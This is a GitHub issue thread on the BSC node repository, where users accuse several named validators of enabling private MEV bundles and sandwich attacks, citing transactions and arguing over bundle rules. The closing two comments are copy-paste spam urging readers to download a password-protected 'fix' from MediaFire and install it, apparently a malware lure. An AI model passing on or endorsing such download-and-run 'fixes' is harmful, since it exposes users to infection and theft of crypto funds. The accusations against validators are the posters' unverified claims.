### ISSUE TITLE
Warning! MEV appear on BSC!

### ISSUE THREAD

**Issue by ctanbern** [bnb-chain/bsc#1101]
Validator: Avengers
Validator: Alps
Validator: BNB48 Club

This validators provide closed access to MEV. What is contrary to the principles of the network.
Same adress run several mev bots on ETH main network. https://etherscan.io/address/0x38563699560e4512c7574c8cc5cf89fd43923bca

https://bscscan.com/tx/0x0302b02863b497d8bc0d081b8e5572ceb5c181b942e1cbd49e4248fa4e7445e0 
This tx is example. Its never was in public mempool. Anyone can check this. 
This tx appear ONLY when confirmied. Since this adress use ONLY this validators list, we have understand whats goin on.
![chrome_UkkskaKnJM](https://user-images.githubusercontent.com/22947189/192512116-8e35ed53-88e5-4929-bf8f-b1c3976b6a66.png)

https://bscscan.com/tx/0xf28c8790840d9dbcf627b290548a20dc4f7448a655218e835d303372694f59d8
https://bscscan.com/tx/0x6d9843999f569b06b00d93ded39d102404cfa1592dd37892069ee87f48d047e6

**Comment by greyireland** [comment]
![image](https://user-images.githubusercontent.com/9276742/192524859-8d63196b-854d-45fd-8c51-0f25a754fca8.png)

https://bscscan.com/address/0x00000000066f02e61a296e9f877ea4930c1622f2

### This is too disgusting, these validators should be kicked out
- Avengers
- Alps
- BNB48 Club

**Comment by greyireland** [comment]
This sandwich does not hide at all, stealing money directly from users, they are the biggest threat to BSC

**Comment by whoami2323** [comment]
you are seeing it first time it seems its happening from years and trust me no one in bsc give the fuck about it and wont do it anything i m 1000% sure

**Comment by du5** [comment]
https://github.com/bnb-chain/bsc/issues/1036#issuecomment-1200649479

**Comment by guagualvcha** [comment]
https://github.com/bnb-chain/bsc/issues/1036#issuecomment-1200649479

**Comment by greyireland** [comment]
What else does bsc have about the internal operations of validators?

**Comment by wangtsiao** [comment]
This definitely will destroy BSC, strongly support kicking these validators and punishing them.

**Comment by haliliceylan** [comment]
what is this program which you get screenshoot ? which show deatiled informations about tx

**Comment by ctanbern** [comment]
Blocknative

ср, 5 окт. 2022 г., 13:16 Halil İbrahim ceylan ***@***.***>:

**Comment by banlieu451** [comment]
This exist many years ago and there is many other method to earn money ! ... why post it in issue from BSC FULL NODE ?

**Comment by banlieu451** [comment]
For every vote down are you kidding me, what if right now every body open an issue Oh there is sniper Oh there is arbitrage Oh there thsi you kdding me ? its a BSC FULL NODE issue not a forum just reflect really reflect yourself your incredible you make people and developper loosing time to solve issue !

**Comment by skipidarus** [comment]
avenger make possible sandwich attack
see address https://bscscan.com/address/0xceb42430fd0b1de5a251a2c3e1744e3521c5ae1c
validator avanger make bundle in block with txs from 2 address. incoming and outgoing
you need stopped this

**Comment by skipidarus** [comment]
@whoami2323 in nodereal only one tx sender is allowed within one bundle) it is make impossible sandwich attack

**Comment by alexbrownf1** [comment]
nodereal is OK, their service no longer helps sandwich.
bnb48/Avengers are doing shit, very disgusting.

**Comment by rashtug2** [comment]
> avenger make possible sandwich attack see address https://bscscan.com/address/0xceb42430fd0b1de5a251a2c3e1744e3521c5ae1c validator avanger make bundle in block with txs from 2 address. incoming and outgoing you need stopped this

someone is running this type of transaction on my wallet to steal my stalk token, how can i stop him

**Comment by whoami2323** [comment]
> @whoami2323 in nodereal only one tx sender is allowed within one bundle) it is make impossible sandwich attack

lol u might need to upgrade your programming capability its possible to send buy and sale transactions from 2 different address in same bundle and like buy from 1st send tokens to 2nd , sale tokens from 2nd and do sandwich i hope you get my point , so its 1000% possible

**Comment by polyphia** [comment]
It's absolutely disgusting that these validators are pulling such dirty tricks and getting away with it . 

MEV on a decentralized chain like ETH is understandable + everyone has a chance of doing it , but what's going on here is basically a few validators abusing their power for self benefict (for example some of these validators are doing arbitrage and destroying their competition in a very unfair way) and going against the basic principles of the chain.

If Binance doesn't do anything about these occurrences there's no reason for BSC to be .

Guess this goes a long way in showing the kind of corruption going on in the backstages of crypto ...

**Comment by Brion-L** [comment]
> This tx is example. Its never was in public mempool. Anyone can check this.
> This tx appear ONLY when confirmied.

sorry to rekindling this age old topic, just want to inquire @ctanbern @greyireland, may I know how can I check that this tx is never in public mempool?

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
